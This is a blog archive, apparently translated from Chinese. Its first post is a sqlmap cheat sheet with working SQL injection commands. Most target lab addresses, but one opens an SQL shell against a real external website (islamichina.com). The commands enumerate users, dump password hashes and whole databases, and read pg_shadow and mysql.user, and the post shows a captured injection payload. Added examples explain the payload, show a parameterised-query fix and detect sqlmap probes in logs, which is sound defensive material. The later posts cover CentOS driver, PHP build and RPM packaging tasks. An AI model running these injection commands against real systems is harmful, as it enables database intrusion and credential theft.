262011

Compiled by mickey
Source: 影子

Update (check out the development trunk)
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Execute SQL statements through the interactive SQL shell
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell

More detailed output (verbosity level 5)
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5

Load options from a configuration INI file
sqlmap -c sqlmap.conf

Submit using the POST method
sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

Submit via cookies; separate cookie values with ';' (TamperData can be used to capture the cookies)
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

Spoof the Referer header
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

Use a custom User-Agent, or pick one at random from the bundled user-agents.txt
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

Use HTTP Basic authentication
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

Use HTTP Digest authentication
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

Use a proxy (can be combined with Tor)
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

Use multiple threads for blind inference
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

Skip dynamic-parameter detection and name the injectable parameter directly; separate several parameters with commas; the User-Agent header can also be named as the injection point
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

Specify the back-end DBMS, bypassing sqlmap's automatic detection
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

Specify the operating system, bypassing sqlmap's automatic detection
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux
* Windows

Custom payload
Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target, on a page where the SQL query is $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

which makes the payload syntactically correct within the page's query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example sqlmap could have detected and exploited the SQL injection without a custom injection payload, but in real-world applications it is sometimes necessary to provide one.
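The following is an added example, not code from the cheat sheet or from sqlmap. It reproduces the page's query shape with SQLite (the page's target is MySQL) and constructed sample rows, to show two things the section above asserts: the decoded payload keeps the concatenated query syntactically valid, and a parameterised query compares the whole payload as one literal so it never alters the query's structure. The table name and rows are constructed for the demo.

```python
# Added example (not from the original post): shows why the --prefix/--postfix
# payload above keeps the page's query syntactically valid, and how a
# parameterised query neutralises it. SQLite stands in for the page's MySQL
# target; the `users` schema and rows below are constructed sample data.
import sqlite3

# Constructed sample data standing in for the target's `users` table.
SAMPLE_USERS = [("1", "alice"), ("2", "bob")]

# The payload shown on the page, URL-decoded.
PAYLOAD = "1') AND 7433=7433 AND ('test'='test"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_unsafe_query(user_id):
    # Mirrors the page's PHP:
    # "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1"
    return "SELECT * FROM users WHERE id=('" + user_id + "') LIMIT 0, 1"


def lookup_unsafe(conn, user_id):
    # String concatenation: whatever is in user_id becomes part of the SQL text,
    # so the injected AND conditions are parsed and evaluated by the database.
    return conn.execute(build_unsafe_query(user_id)).fetchone()


def lookup_safe(conn, user_id):
    # Parameterised query: user_id is bound as data, so the entire payload string
    # is compared against the id column as one literal and is never parsed as SQL.
    return conn.execute(
        "SELECT * FROM users WHERE id=(?) LIMIT 0, 1", (user_id,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(build_unsafe_query(PAYLOAD))
    print("concatenated:", lookup_unsafe(db, PAYLOAD))
    print("parameterised:", lookup_safe(db, PAYLOAD))
```

With the concatenated query the payload still returns alice's row, which is exactly the "custom injectable" signal sqlmap reports above; with the bound parameter the same input returns nothing, because no id equals the literal string `1') AND 7433=7433 AND ('test'='test`.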

Page comparison by string or regular expression (--string / --regexp)
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v 1

Exclude dynamic page content from the comparison
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-queries test (PHP's built-in mysql_query() does not support multiple statements)
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection combined with the ORDER BY technique
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

Use the UNION technique to retrieve the banner, the current user, or the list of databases
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint the back-end DBMS (-f), optionally together with the banner (-b)
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is a DBA
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

Enumerate database users
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0

Enumerate database user passwords
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

Show user privileges
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of a given table in a given database
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump a given column of a given table in a given database
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Restrict the dump to entries 2 through 4 (--start / --stop)
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump all databases and all tables
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables, excluding system databases
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

Run a SQL query
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and resume a session
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save
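From the defender's side, the request captured earlier in this post (the URL-encoded payload and the sqlmap/0.7rc1 User-Agent) is what shows up in a web server's access log. The following added example, not part of the cheat sheet or of sqlmap, scans combined-format access log lines for that traffic. The three log lines are constructed: one normal request, one with the page's payload and the default sqlmap User-Agent, and one with the same payload behind the custom User-Agent the post shows how to set, which is why the scanner must not rely on the User-Agent alone.

```python
# Added example (not from the original post): a scanner over web-server access
# logs that flags requests resembling the sqlmap probe captured earlier on this
# page. Log lines are constructed in Apache/nginx "combined" format.
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
192.168.1.47 - - [01/Sep/2011:10:00:01 +0800] "GET /sqlmap/mysql/get_str_brackets.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.168.1.47 - - [01/Sep/2011:10:00:16 +0800] "GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
192.168.1.47 - - [01/Sep/2011:10:00:17 +0800] "GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Boolean tautology of the shape shown on the page (AND 7433=7433): same number on both sides.
TAUTOLOGY_RE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)
# A quote, optionally followed by a closing parenthesis, immediately followed by a boolean operator.
BREAKOUT_RE = re.compile(r"""['"]\)?\s*(?:AND|OR)\b""", re.IGNORECASE)


def classify_request(path, user_agent):
    """Return the reasons a single request looks like SQL injection probing (empty if none)."""
    decoded = unquote(path)  # match against the decoded query string, not the %XX form
    reasons = []
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap-user-agent")
    if TAUTOLOGY_RE.search(decoded):
        reasons.append("tautology")
    if BREAKOUT_RE.search(decoded):
        reasons.append("quote-breakout")
    return reasons


def scan_log(text):
    """Parse combined-format log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        reasons = classify_request(m["path"], m["ua"])
        if reasons:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "path": unquote(m["path"]), "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["reasons"], f["path"])
```

The second and third sample lines are both flagged; only the second carries the User-Agent signal, so the payload-shape rules are what catch a scan run with a custom or randomised User-Agent. The tautology pattern is deliberately narrow (identical integers on both sides); it is a signature for the page's example, not a general SQL injection detector.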

Posted by admin
252011

For example, to check the version of the Broadcom NIC driver on a machine that actually has a Broadcom NIC, the simplest way is
ethtool -i eth0

But if the machine we are looking at does not use a Broadcom NIC, the version can still be found as follows.
We know the Broadcom driver module file is called bnx2.ko.
Find where bnx2.ko is located:
updatedb
locate bnx2.ko
The result is:
/lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
Show the driver details:
modinfo /lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
In the output below, the version field is the NIC driver version, here 2.0.8-j15.

filename: /lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
firmware: bnx2/bnx2-rv2p-09ax-5.0.0.j10.fw
firmware: bnx2/bnx2-rv2p-09-5.0.0.j10.fw
firmware: bnx2/bnx2-mips-09-5.0.0.j15.fw
firmware: bnx2/bnx2-rv2p-06-5.0.0.j3.fw
firmware: bnx2/bnx2-mips-06-5.0.0.j6.fw
version: 2.0.8-j15
license: GPL
description: Broadcom NetXtreme II BCM5706/5708/5709/5716 Driver
author: Michael Chan <mchan@broadcom.com>
srcversion: 8CDA41B3E0DF70A112FBA80
alias: pci:v000014E4d0000163Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Bsv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Asv*sd*bc*sc*i*
alias: pci:v000014E4d00001639sv*sd*bc*sc*i*
alias: pci:v000014E4d000016ACsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv0000103Csd00003102bc*sc*i*
alias: pci:v000014E4d0000164Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003106bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003101bc*sc*i*
depends:
vermagic: 2.6.32-71.el6.x86_64 SMP mod_unload modversions
parm: disable_msi:Disable Message Signaled Interrupt (MSI) (int)
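The following is an added example, not part of the original post: a small parser for modinfo output that extracts the fields the post reads by eye (version, firmware files, vermagic) and adds the check a practitioner wants before trusting a module file found on disk: that its vermagic matches the kernel actually running, since a bnx2.ko under another kernel's /lib/modules tree is not the driver in use. The sample text is the bnx2.ko listing shown above; the running-kernel string passed to check_vermagic() is an assumed value that would normally come from `uname -r`.

```python
# Added example (not from the original post): parse `modinfo` output and check
# that the module was built for the running kernel. MODINFO_SAMPLE is the
# bnx2.ko listing from the post; the kernel release given to check_vermagic()
# is an assumed value that would normally be read from `uname -r`.
MODINFO_SAMPLE = """\
filename: /lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
firmware: bnx2/bnx2-rv2p-09ax-5.0.0.j10.fw
firmware: bnx2/bnx2-rv2p-09-5.0.0.j10.fw
firmware: bnx2/bnx2-mips-09-5.0.0.j15.fw
firmware: bnx2/bnx2-rv2p-06-5.0.0.j3.fw
firmware: bnx2/bnx2-mips-06-5.0.0.j6.fw
version: 2.0.8-j15
license: GPL
description: Broadcom NetXtreme II BCM5706/5708/5709/5716 Driver
author: Michael Chan <mchan@broadcom.com>
srcversion: 8CDA41B3E0DF70A112FBA80
alias: pci:v000014E4d0000163Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Bsv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Asv*sd*bc*sc*i*
alias: pci:v000014E4d00001639sv*sd*bc*sc*i*
alias: pci:v000014E4d000016ACsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv0000103Csd00003102bc*sc*i*
alias: pci:v000014E4d0000164Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003106bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003101bc*sc*i*
depends:
vermagic: 2.6.32-71.el6.x86_64 SMP mod_unload modversions
parm: disable_msi:Disable Message Signaled Interrupt (MSI) (int)
"""

# Fields that modinfo prints once per value; collected into lists.
MULTI_VALUED = {"firmware", "alias", "parm", "depends"}


def parse_modinfo(text):
    """Turn `key: value` lines into a dict; repeated keys become lists."""
    info = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        # Split at the first colon only: alias and parm values contain colons themselves.
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key in MULTI_VALUED:
            values = info.setdefault(key, [])
            if value:  # "depends:" is legitimately empty
                values.append(value)
        else:
            info[key] = value
    return info


def built_for_kernel(info):
    """Kernel release the module was compiled against (first token of vermagic)."""
    vermagic = info.get("vermagic", "")
    return vermagic.split()[0] if vermagic else ""


def check_vermagic(info, running_kernel):
    """True when the module file matches the running kernel; False for a stale tree."""
    return built_for_kernel(info) == running_kernel


if __name__ == "__main__":
    mod = parse_modinfo(MODINFO_SAMPLE)
    print("driver version:", mod["version"])
    print("firmware files:", len(mod["firmware"]))
    # Assumed running kernel; on a real host use platform.release() or `uname -r`.
    print("matches running kernel:", check_vermagic(mod, "2.6.32-71.el6.x86_64"))
```

Reading `version` answers the post's question; comparing `vermagic` against the running kernel is the extra step that tells you whether the file you located is the driver the system is actually using, rather than a leftover from an older kernel package.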

Posted by admin
212011

On 64-bit CentOS 6, 32-bit packages are not installed by default, so the libraries we install before building PHP are only present in their 64-bit versions.

For example:
yum -y install libjpeg libjpeg-devel libpng libpng-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel mhash freetype freetype-devel

Installed this way, the system only provides the 64-bit versions. Suppose we then configure PHP with the following command:

CHOST="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe" CXXFLAGS="-march=nocona -O2 -pipe" \
./configure --prefix=/usr/local/php \
--with-config-file-path=/etc \
--with-mysql=/usr/local/mysql --with-pdo-mysql=/usr/local/mysql/bin/mysql_config \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--with-iconv-dir=/usr/local \
--with-freetype-dir --with-jpeg-dir \
--with-png-dir --with-ttf \
--enable-zip --with-zlib \
--with-gd \
--disable-rpath --enable-discard-path \
--enable-safe-mode --enable-bcmath \
--enable-shmop --enable-sysvsem \
--with-curl --with-curlwrappers \
--enable-fastcgi --enable-force-cgi-redirect \
--enable-mbstring --with-mcrypt \
--disable-ipv6 \
--enable-static \
--enable-maintainer-zts \
--enable-zend-multibyte \
--enable-sockets \
--enable-soap \
--with-openssl \
--without-sqlite --without-pdo-sqlite

configure then fails with
configure: error: libjpeg.(a|so) not found.

even though rpm -qa | grep libjpeg shows the package is installed.

The fix is to add the following option to configure:

--with-libdir=lib64

After the change the command looks like this:

CHOST="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe" CXXFLAGS="-march=nocona -O2 -pipe" \
./configure --prefix=/usr/local/php \
--with-libdir=lib64 \
--with-config-file-path=/etc \
--with-mysql=/usr/local/mysql --with-pdo-mysql=/usr/local/mysql/bin/mysql_config \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--with-iconv-dir=/usr/local \
--with-freetype-dir --with-jpeg-dir \
--with-png-dir --with-ttf \
--enable-zip --with-zlib \
--with-gd \
--disable-rpath --enable-discard-path \
--enable-safe-mode --enable-bcmath \
--enable-shmop --enable-sysvsem \
--with-curl --with-curlwrappers \
--enable-fastcgi --enable-force-cgi-redirect \
--enable-mbstring --with-mcrypt \
--disable-ipv6 \
--enable-static \
--enable-maintainer-zts \
--enable-zend-multibyte \
--enable-sockets \
--enable-soap \
--with-openssl \
--without-sqlite --without-pdo-sqlite

However, since our MySQL was not installed from an rpm but compiled from source into /usr/local/mysql,
using the configure arguments above produces

configure: error: Cannot find libmysqlclient_r under /usr/local/mysql/.
Note that the MySQL client library is not bundled anymore!

In that case, make this change:

ln -s /usr/local/mysql/lib /usr/local/mysql/lib64

With that, configure succeeds; then run make && make install.

Aside: to install 32-bit packages with yum on 64-bit CentOS 6,
echo 'multilib_policy=all' >> /etc/yum.conf
is all that is needed.

Posted by admin
192011

1. Set up the environment
yum -y install rpm-build
2. Download the source rpm
mkdir /root/download
cd /root/download
wget http://www.percona.com/redir/downloads/Percona-Server-5.1/Percona-Server-5.1.58-12.9/source/Percona-Server-51-5.1.58-rel12.9.271.rhel6.src.rpm

3. Install the packages MySQL needs at build time

yum -y install perl readline-devel gcc-c++ ncurses-devel zlib-devel libtool automake autoconf time ccache bison

4. Install the Percona source rpm
rpm -ivh Percona-Server-51-5.1.58-rel12.9.271.rhel6.src.rpm

This installs two files, located at
/root/rpmbuild/SOURCES/Percona-Server-5.1.58.tar.gz
/root/rpmbuild/SPECS/percona-server.spec

5. Edit percona-server.spec
Add our own build options:
vi percona-server.spec

Change the section between

# The --enable-assembler simply does nothing on systems that does not
# support assembler speedups.

and

%if %{YASSL_BUILD}

to the following:

# The --enable-assembler simply does nothing on systems that does not
# support assembler speedups.
sh -c  "CFLAGS=\"$CFLAGS\" \
        CXXFLAGS=\"$CXXFLAGS\" \
        AM_CPPFLAGS=\"$AM_CPPFLAGS\" \
        LDFLAGS=\"$LDFLAGS\" \
        ./configure \
            $* \
            --with-comment=MC-DB \
            --with-server-suffix=-MC-DB-Server \
            --with-charset=utf8 \
            --with-plugins=blackhole,csv,innodb_plugin \
            --enable-assembler \
            --enable-local-infile \
            --with-mysqld-user=%{mysqld_user} \
            --with-unix-socket-path=/tmp/mysql.sock \
            --with-pic \
            --prefix=/usr \
            --with-extra-charsets=gbk,gb2312,utf8 \
            --without-debug \
            --with-pthread \
            --enable-thread-safe-client \
            --with-client-ldflags=-all-static \
            --without-ndb-debug \
%if %{YASSL_BUILD}

Save and exit.

6. Disable the test suite during packaging
export MYSQL_RPMBUILD_TEST="no"

7. Start the build
cd /root/rpmbuild/SPECS/
rpmbuild -bb percona-server.spec
After a while the built packages appear in
/root/rpmbuild/RPMS/x86_64

Percona-Server-client-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-devel-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-server-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-shared-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-test-51-5.1.58-rel12.9.rhel6.x86_64.rpm

8. Installation order
Install this one first:
Percona-Server-shared-51-5.1.58-rel12.9.rhel6.x86_64.rpm
then the remaining packages.
9. Known issues:
Everything cannot be built into a single package.
All files cannot be installed into a single directory, e.g. the /usr/local/mysql we have always used.

10. Aside
MySQL source tarballs generally include the spec file needed for packaging, usually under support-files/.

Posted by admin
192011

When installing software with yum on 64-bit CentOS 6, 32-bit packages are not installed by default, which makes some software fail to install. The yum repository does contain 32-bit packages; yum simply installs only the 64-bit ones by default. To install 32-bit packages there are two methods.
Suppose you want the 32-bit version of libjpeg.

Method 1:
Query first:
yum list | grep libjpeg
then install the 32-bit build explicitly:
yum install libjpeg.i686

Method 2:
This is the once-and-for-all approach:
echo 'multilib_policy=all' >> /etc/yum.conf
The following command then installs both the 32-bit and the 64-bit version:
yum install libjpeg

Reference: http://grokbase.com/t/centos.org/centos/2011/07/centos-centos6-installing-32bit-and-64bit-rpms-via-the-installer/133tcfqf5pag5uldm62ygv34psia

Posted by admin